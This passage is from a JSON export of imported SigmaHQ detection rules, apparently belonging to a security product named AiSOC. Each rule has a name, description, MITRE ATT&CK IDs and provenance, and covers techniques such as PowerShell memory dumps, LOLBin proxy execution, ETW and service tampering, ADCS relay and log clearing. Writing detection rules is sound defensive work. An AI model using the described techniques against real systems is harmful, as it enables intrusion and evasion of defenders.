"source_id": "ccd55945-badd-4bae-936b-823a735d37dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/application/github/audit/github_push_protection_disabled.yml" } }, { "id": "sigmahq-sigma-ccd6a6c8-bb4e-4a91-9d2a-07e632819374", "type": "detection", "name": "AWS SAML Provider Deletion Activity", "description": "Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access.\nAn attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-saml-provider-deletion-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ccd6a6c8-bb4e-4a91-9d2a-07e632819374", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_delete_saml_provider.yml" } }, { "id": "sigmahq-sigma-cd072b25-a418-4f98-8ebc-5093fb38fe1a", "type": "detection", "name": "Cisco Collect Data", "description": "Collect pertinent data from the configuration files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1087.001", "T1552.001", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-collect-data.yaml", "quarantine_reason": "imported rule; upstream 
query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_collect_data.yml" } }, { "id": "sigmahq-sigma-cd0a4943-0edd-42cf-b50c-06f77a10d4c1", "type": "detection", "name": "FortiGate - New Administrator Account Created", "description": "Detects the creation of an administrator account on a Fortinet FortiGate Firewall.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-new-administrator-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd0a4943-0edd-42cf-b50c-06f77a10d4c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_admin_account_created.yml" } }, { "id": "sigmahq-sigma-cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "type": "detection", "name": "Invoke-Obfuscation Via Use Rundll32 - Security", "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-rundll32-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" } }, { "id": "sigmahq-sigma-cd185561-4760-45d6-a63e-a51325112cae", "type": "detection", "name": "Live Memory Dump Using Powershell", "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/live-memory-dump-using-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd185561-4760-45d6-a63e-a51325112cae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" } }, { "id": "sigmahq-sigma-cd1f961e-0b96-436b-b7c6-38da4583ec00", "type": "detection", "name": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": 
"_quarantine", "mitre_techniques": [ "T1685", "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-trace-etw-session-tamper-via-logman-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml" } }, { "id": "sigmahq-sigma-cd219ff3-fa99-45d4-8380-a7d15116c6dc", "type": "detection", "name": "New User Created Via Net.EXE", "description": "Identifies the creation of local users via the net.exe command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-user-created-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_user_add.yml" } }, { "id": "sigmahq-sigma-cd277474-5c52-4423-a52b-ac2d7969902f", "type": "detection", "name": "New BgInfo.EXE Custom WMI Query Registry Configuration", "description": "Detects setting of a new registry value related to BgInfo configuration, which can 
be abused to execute a custom WMI query via \"BgInfo.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bginfo-exe-custom-wmi-query-registry-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd277474-5c52-4423-a52b-ac2d7969902f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml" } }, { "id": "sigmahq-sigma-cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", "type": "detection", "name": "Google Cloud Kubernetes CronJob", "description": "Identifies when a Kubernetes CronJob runs in Google Cloud (GKE). Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. 
Kubernetes CronJob is used to schedule Jobs.\nAn adversary may use a Kubernetes CronJob to schedule execution of malicious code that would run as a container in the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-kubernetes-cronjob.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml" } }, { "id": "sigmahq-sigma-cd3d1298-eb3b-476c-ac67-12847de55813", "type": "detection", "name": "DLL Execution via Rasautou.exe", "description": "Detects use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with the -p option.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-execution-via-rasautou-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd3d1298-eb3b-476c-ac67-12847de55813", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" } }, { "id": "sigmahq-sigma-cd55f721-5623-4663-bd9b-5229cab5237d", "type": "detection", "name": "OpenCanary - SSH New Connection Attempt", "description": "Detects instances where an SSH service on an OpenCanary node has had a connection attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1021", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-ssh-new-connection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd55f721-5623-4663-bd9b-5229cab5237d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_ssh_new_connection.yml" } }, { "id": "sigmahq-sigma-cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", "type": "detection", "name": "New Firewall Rule Added Via Netsh.EXE", "description": "Detects the addition of a new rule to the Windows firewall via netsh", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-firewall-rule-added-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_add_rule.yml" } }, { "id": "sigmahq-sigma-cd71385d-fd9b-4691-9b98-2b1f7e508714", "type": "detection", "name": "Lolbin Runexehelper Use As Proxy", "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbin-runexehelper-use-as-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml" } }, { "id": "sigmahq-sigma-cd764533-2e07-40d6-a718-cfeec7f2da7f", "type": "detection", "name": "Renamed SysInternals DebugView Execution", "description": "Detects suspicious renamed SysInternals DebugView execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-sysinternals-debugview-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"cd764533-2e07-40d6-a718-cfeec7f2da7f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml" } }, { "id": "sigmahq-sigma-cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca", "type": "detection", "name": "Suspicious File Creation Activity From Fake Recycle.Bin Folder", "description": "Detects file write events from/to a fake recycle bin folder that is often used as a staging directory for malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-creation-activity-from-fake-recycle-bin-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml" } }, { "id": "sigmahq-sigma-cd8c163e-a19b-402e-bdd5-419ff5859f12", "type": "detection", "name": "HackTool - ADCSPwn Execution", "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-adcspwn-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_adcspwn.yml" } }, { "id": "sigmahq-sigma-cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "type": "detection", "name": "Always Install Elevated Windows Installer", "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/always-install-elevated-windows-installer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml" } }, { "id": "sigmahq-sigma-cdb15e19-c2d0-432a-928e-e49c8c60dcf2", "type": "detection", "name": "Potential DLL Sideloading Of MsCorSvc.DLL", "description": "Detects potential DLL sideloading of \"mscorsvc.dll\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-mscorsvc-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cdb15e19-c2d0-432a-928e-e49c8c60dcf2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_mscorsvc.yml" } }, { "id": "sigmahq-sigma-cdc8da7d-c303-42f8-b08c-b4ab47230263", "type": "detection", "name": "Rundll32 Internet Connection", "description": "Detects a rundll32 that communicates with public IP addresses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-internet-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" } }, { "id": "sigmahq-sigma-cde0a575-7d3d-4a49-9817-b8004a7bf105", "type": "detection", "name": "Uncommon New Firewall Rule Added In Windows Firewall Exception List", "description": "Detects when a rule has been added to the Windows Firewall exception list", "version": "1.0.0", "author": "AiSOC", 
"tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-new-firewall-rule-added-in-windows-firewall-exception-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" } }, { "id": "sigmahq-sigma-cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "type": "detection", "name": "Potential Encoded PowerShell Patterns In CommandLine", "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-encoded-powershell-patterns-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_encoding_patterns.yml" } }, { "id": "sigmahq-sigma-cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5", "type": "detection", "name": "Potential 
Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock", "description": "Detects the use of the \"Get-ADComputer\" cmdlet in order to identify systems which are configured for unconstrained delegation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1558", "T1589.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-unconstrained-delegation-discovery-via-get-adcomputer-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_potential_unconstrained_delegation_discovery.yml" } }, { "id": "sigmahq-sigma-ce446a9e-30b9-4483-8e38-d2c9ad0a2280", "type": "detection", "name": "Steganography Hide Files with Steghide", "description": "Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/steganography-hide-files-with-steghide.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_steghide_embed_steganography.yml" } }, { "id": "sigmahq-sigma-ce5678bb-b9aa-4fb5-be4b-e57f686256ad", "type": "detection", "name": "Potential Remote Desktop Connection to Non-Domain Host", "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-desktop-connection-to-non-domain-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" } }, { "id": "sigmahq-sigma-ce7066a6-508a-42d3-995b-2952c65dc2ce", "type": "detection", "name": "Drop Binaries Into Spool Drivers Color Folder", "description": "Detects the creation of suspicious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" directory, as seen in the blog post referenced by the upstream rule", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/drop-binaries-into-spool-drivers-color-folder.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" } }, { "id": "sigmahq-sigma-ce72ef99-22f1-43d4-8695-419dcb5d9330", "type": "detection", "name": "Suspicious Windows Service Tampering", "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-service-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml" } }, { "id": "sigmahq-sigma-ce7cf472-6fcc-490a-9481-3786840b5d9b", "type": "detection", "name": "InfDefaultInstall.exe .inf Execution", "description": "Detects InfDefaultInstall.exe executing an SCT script via scrobj.dll from a command entered into a specially prepared INF file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": 
[ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/infdefaultinstall-exe-inf-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" } }, { "id": "sigmahq-sigma-cea2b7ea-792b-405f-95a1-b903ea06458f", "type": "detection", "name": "Suspicious Child Process Of Manage Engine ServiceDesk", "description": "Detects suspicious child processes of the \"Manage Engine ServiceDesk Plus\" Java web service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-manage-engine-servicedesk.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml" } }, { "id": "sigmahq-sigma-cea72823-df4d-4567-950c-0b579eaf0846", "type": "detection", "name": "Potential Dropper Script Execution Via WScript/CScript/MSHTA", "description": "Detects wscript/cscript/mshta 
executions of scripts located in user directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dropper-script-execution-via-wscript-cscript-mshta.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cea72823-df4d-4567-950c-0b579eaf0846", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_mshta_dropper.yml" } }, { "id": "sigmahq-sigma-ceb407f6-8277-439b-951f-e4210e3ed956", "type": "detection", "name": "Cisco Clear Logs", "description": "Detects clearing of the command history on a Cisco network OS, which is used for defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-clear-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ceb407f6-8277-439b-951f-e4210e3ed956", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_clear_logs.yml" } }, { "id": "sigmahq-sigma-ceb55fd0-726e-4656-bf4e-b585b7f7d572", "type": "detection", "name": "Suspicious Inbox 
